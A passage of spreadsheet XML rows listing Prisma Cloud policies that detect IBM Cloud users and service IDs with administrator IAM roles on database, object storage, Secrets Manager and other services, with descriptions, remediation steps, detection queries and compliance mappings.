          <t>1aa3d004-2d69-450f-ac58-69d9acaabec1</t>
        </is>
      </c>
      <c r="AI3313" t="inlineStr">
        <is>
          <t>8a39ec59-47b9-4e2f-ac0f-08a54fee5fc5</t>
        </is>
      </c>
      <c r="AJ3313" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3313" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3314">
      <c r="A3314" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, SOC 2, ISO/IEC 27001:2022, TX-RAMP Level 1, CSA CCM v4.0.12, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3314" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3314" s="2" t="inlineStr"/>
      <c r="D3314" t="inlineStr"/>
      <c r="E3314" t="inlineStr"/>
      <c r="F3314" t="inlineStr"/>
      <c r="G3314" t="b">
        <v>1</v>
      </c>
      <c r="H33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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3314" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3314" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Databases for MySQL service</t>
        </is>
      </c>
      <c r="L3314" t="inlineStr"/>
      <c r="M3314" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3314" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3314" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3314" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3314" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R3314" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S3314" t="inlineStr"/>
      <c r="T3314" t="b">
        <v>0</v>
      </c>
      <c r="U3314" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3314" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3314" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with administrator role permission for Databases for MySQL service. A user has full platform control as an administrator, including the ability to assign other users access policies and modify deployment passwords. If a user with administrator privilege becomes compromised, it may result in a compromised database. As a security best practice, it is advised to provide the least privilege access, such as allowing only the rights necessary to complete a task, instead of excessive permissions.</t>
        </is>
      </c>
      <c r="X3314" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and check the 'Access policies' section&gt; Click on three dots on the right corner of a row for the policy which is having Administrator permission on 'Databases for MySQL' service
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3314" t="inlineStr"/>
      <c r="Z3314"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"databases-for-mysql" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resourceGroupId","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3314" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3314" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3314" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1026</t>
        </is>
      </c>
      <c r="AD3314" t="b">
        <v>1</v>
      </c>
      <c r="AE3314" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3314" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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4" t="inlineStr">
        <is>
          <t>c0f075cd-1471-41d3-89e2-38b976ab7ee8</t>
        </is>
      </c>
      <c r="AI3314" t="inlineStr">
        <is>
          <t>cd90b4e9-49fd-4f1e-8b0c-085e2807364e</t>
        </is>
      </c>
      <c r="AJ3314" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3314" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3315">
      <c r="A3315" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, ITSG-33, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1, NIST CSF v2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3315" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3315" s="2" t="inlineStr"/>
      <c r="D3315" t="inlineStr"/>
      <c r="E3315" t="inlineStr"/>
      <c r="F3315" t="inlineStr"/>
      <c r="G3315" t="b">
        <v>1</v>
      </c>
      <c r="H33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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3315" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3315" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for all Identity and Access enabled services</t>
        </is>
      </c>
      <c r="L3315" t="inlineStr"/>
      <c r="M3315" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3315" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3315" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3315" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3315" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3315" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3315" t="inlineStr"/>
      <c r="T3315" t="b">
        <v>0</v>
      </c>
      <c r="U3315" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3315" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3315" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Users, where policy with administrator role permission across all Identity and Access enabled services. Users with administrator role on All Identity and Access enabled services can access all services or resources in the account. If a user with administrator privilege becomes compromised, it may result in compromised resources in the account. As a security best practice, granting the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions is recommended.</t>
        </is>
      </c>
      <c r="X3315" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and under the 'Access policies' section&gt; Click on three dots on the right corner of a row for the policy which is having Administrator permission on 'All Identity and Access enabled services' 
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3315" t="inlineStr"/>
      <c r="Z3315" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case "access" and roles[?any( role_id contains "crn:v1:bluemix:public:iam::::role:Administrator" )] exists and resources[?any(tags does not exist and attributes[?any( value equal ignore case "service" and name equal ignore case "serviceType" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name equal ignore case "region")] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3315" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3315" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3315" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1018</t>
        </is>
      </c>
      <c r="AD3315" t="b">
        <v>1</v>
      </c>
      <c r="AE3315" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3315" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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5" t="inlineStr">
        <is>
          <t>3b72a061-ae54-4f11-a51b-60ae041072b4</t>
        </is>
      </c>
      <c r="AI3315" t="inlineStr">
        <is>
          <t>28c2b727-2d58-49db-b409-33afa3c98970</t>
        </is>
      </c>
      <c r="AJ3315" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3315" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3316">
      <c r="A3316" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, SOC 2, SOC 2, TX-RAMP Level 1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3316" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3316" s="2" t="inlineStr"/>
      <c r="D3316" t="inlineStr"/>
      <c r="E3316" t="inlineStr"/>
      <c r="F3316" t="inlineStr"/>
      <c r="G3316" t="b">
        <v>1</v>
      </c>
      <c r="H33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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3316" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3316" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Cloud object storage buckets</t>
        </is>
      </c>
      <c r="L3316" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3316" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3316" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3316" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3316" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3316" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3316" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3316" t="inlineStr"/>
      <c r="T3316" t="b">
        <v>0</v>
      </c>
      <c r="U3316" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3316" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3316" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with overly permissive administrative role on IBM Cloud cloud object storage service. 
IBM Cloud Object Storage is a highly scalable, resilient, and secure managed data storage service on the IBM Cloud platform that offers an alternative to traditional block and file storage solutions. When a user having a policy with admin rights on object storage gets compromised, the whole service gets compromised. 
As a security best practice, it is recommended to grant the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3316" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', and then click on 'Users' in the left panel.
3. Select the user for whom you want to edit access.
4. Go to the 'Access' tab, and under the 'Access policies' section, click on the three dots on the right corner of a row for the policy that has administrator permission on the 'IBM Cloud Object Storage' service.
5. Click on Remove or Edit to assign limited permission to the policy.
6. Review the policy details that you're about to edit or remove, and confirm by clicking Save or Remove.</t>
        </is>
      </c>
      <c r="Y3316" t="inlineStr"/>
      <c r="Z3316"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"cloud-object-storage" and operator is member of ("stringEquals", "stringMatch"))] exists and (attributes[?any( name is member of ("resource","resourceGroupId","serviceInstance","prefix"))] does not exist or attributes[?any( name equal ignore case "resourceType" and value equal ignore case "bucket" )] exists ) )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3316" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3316" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3316" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1154</t>
        </is>
      </c>
      <c r="AD3316" t="b">
        <v>1</v>
      </c>
      <c r="AE3316" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3316" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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6" t="inlineStr">
        <is>
          <t>98f921f7-ac10-429d-87fa-f31f245502cb</t>
        </is>
      </c>
      <c r="AI3316" t="inlineStr">
        <is>
          <t>c55e4e1d-b468-466c-b903-3ef26be2760a</t>
        </is>
      </c>
      <c r="AJ3316" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3316" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3317">
      <c r="A3317" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, SOC 2, ISO/IEC 27001:2022, TX-RAMP Level 1, CSA CCM v4.0.12, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3317" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3317" s="2" t="inlineStr"/>
      <c r="D3317" t="inlineStr"/>
      <c r="E3317" t="inlineStr"/>
      <c r="F3317" t="inlineStr"/>
      <c r="G3317" t="b">
        <v>1</v>
      </c>
      <c r="H33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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3317" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3317" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Databases for PostgreSQL service</t>
        </is>
      </c>
      <c r="L3317" t="inlineStr"/>
      <c r="M3317" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3317" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3317" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3317" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3317" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R3317" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S3317" t="inlineStr"/>
      <c r="T3317" t="b">
        <v>0</v>
      </c>
      <c r="U3317" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3317" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3317" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with administrator role permission for Databases for PostgreSQL service. A user has full platform control as an administrator, including the ability to assign other users access policies and modify deployment passwords. If a user with administrator privilege becomes compromised, it may result in a compromised database. As a security best practice, it is advised to provide the least privilege access, such as allowing only the rights necessary to complete a task, instead of excessive permissions.</t>
        </is>
      </c>
      <c r="X3317" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and under the 'Access policies' section&gt; Click on three dots on the right corner of a row for the policy which is having Administrator permission on 'Databases for PostgreSQL' service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3317" t="inlineStr"/>
      <c r="Z3317"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"databases-for-postgresql" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resourceGroupId","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3317" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3317" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3317" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1025</t>
        </is>
      </c>
      <c r="AD3317" t="b">
        <v>1</v>
      </c>
      <c r="AE3317" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3317" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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7" t="inlineStr">
        <is>
          <t>0b7061e2-200a-4fec-beee-9ac5202346f3</t>
        </is>
      </c>
      <c r="AI3317" t="inlineStr">
        <is>
          <t>c28a61c8-8243-4ef6-87ac-104b2bef980c</t>
        </is>
      </c>
      <c r="AJ3317" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3317" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3318">
      <c r="A3318" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HIPAA, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ITSG-33, CIS v1.1.0 (IBM Cloud) Level 1, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, SOC 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3318" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3318" s="2" t="inlineStr"/>
      <c r="D3318" t="inlineStr"/>
      <c r="E3318" t="inlineStr"/>
      <c r="F3318" t="inlineStr"/>
      <c r="G3318" t="b">
        <v>1</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3318" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3318" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for all Identity and Access enabled services</t>
        </is>
      </c>
      <c r="L3318" t="inlineStr"/>
      <c r="M3318" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3318" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3318" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3318" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3318" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3318" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3318" t="inlineStr"/>
      <c r="T3318" t="b">
        <v>0</v>
      </c>
      <c r="U3318" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3318" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3318" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service ID, which has administrator role permission across 'All Identity and Access enabled services'. Service IDs with administrator permission on 'All Identity and Access enabled services' can access all services or resources in the account. If a Service ID with administrator privileges becomes compromised, it may result in compromised resources in the account. As a security best practice, granting the least privilege access, such as granting only the permissions required to perform a task instead of providing excessive permissions, is recommended.</t>
        </is>
      </c>
      <c r="X3318" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Service IDs' in the left panel.
3. Select the Service ID that is reported and that you want to edit access for.
4. Under the 'Access' tab, go to the 'Access policies' section &gt; Click on three dots on the right corner of a row for the policy, which has administrator permission on 'All Identity and Access enabled services' 
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3318" t="inlineStr"/>
      <c r="Z3318" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case "access" and roles[?any( role_id contains "crn:v1:bluemix:public:iam::::role:Administrator" )] exists and resources[?any(tags does not exist and attributes[?any( value equal ignore case "service" and name equal ignore case "serviceType" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name equal ignore case "region")] does not exist)] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3318" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3318" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3318" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1032</t>
        </is>
      </c>
      <c r="AD3318" t="b">
        <v>1</v>
      </c>
      <c r="AE3318" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3318" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>ceac8631-0dbd-4aa1-bff7-a1ebdd45b98b</t>
        </is>
      </c>
      <c r="AI3318" t="inlineStr">
        <is>
          <t>7f970ead-0924-4511-90a0-515ca9b600e0</t>
        </is>
      </c>
      <c r="AJ3318" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3318" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3319">
      <c r="A3319" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HIPAA, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO/IEC 27001:2022, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3319" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3319" s="2" t="inlineStr"/>
      <c r="D3319" t="inlineStr"/>
      <c r="E3319" t="inlineStr"/>
      <c r="F3319" t="inlineStr"/>
      <c r="G3319" t="b">
        <v>1</v>
      </c>
      <c r="H33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19" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3319" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3319" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Secrets Manager service</t>
        </is>
      </c>
      <c r="L3319" t="inlineStr"/>
      <c r="M3319" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3319" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3319" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3319" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3319" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3319" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3319" t="inlineStr"/>
      <c r="T3319" t="b">
        <v>0</v>
      </c>
      <c r="U3319" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3319" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3319" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with administrator role permission for the Secrets Manager service. Users with admin access will be able to perform all platform tasks for Secrets Manager, including the creation, modification, and deletion of Secrets Manager service instances, as well as the assignment of access policies to other users. On Secret Manager, there is a chance that sensitive data might be exposed in the underlying service if a user with administrative rights is compromised. As a security best practice, it is recommended to grant the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3319" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and under the 'Access policies' section&gt; Click on three dots on the right corner of a row for the policy which is having Administrator permission on 'Secrets Manager' service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3319" t="inlineStr"/>
      <c r="Z3319"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"secrets-manager" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","resourceType","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3319" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3319" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3319" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1021</t>
        </is>
      </c>
      <c r="AD3319" t="b">
        <v>1</v>
      </c>
      <c r="AE3319" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3319" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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19" t="inlineStr">
        <is>
          <t>d7767e17-de31-44cd-b3d0-09dab07f8221</t>
        </is>
      </c>
      <c r="AI3319" t="inlineStr">
        <is>
          <t>7c2d803e-aae4-4a4e-8ce8-b01fd3bd41a3</t>
        </is>
      </c>
      <c r="AJ3319" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3319" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3320">
      <c r="A3320" t="inlineStr">
        <is>
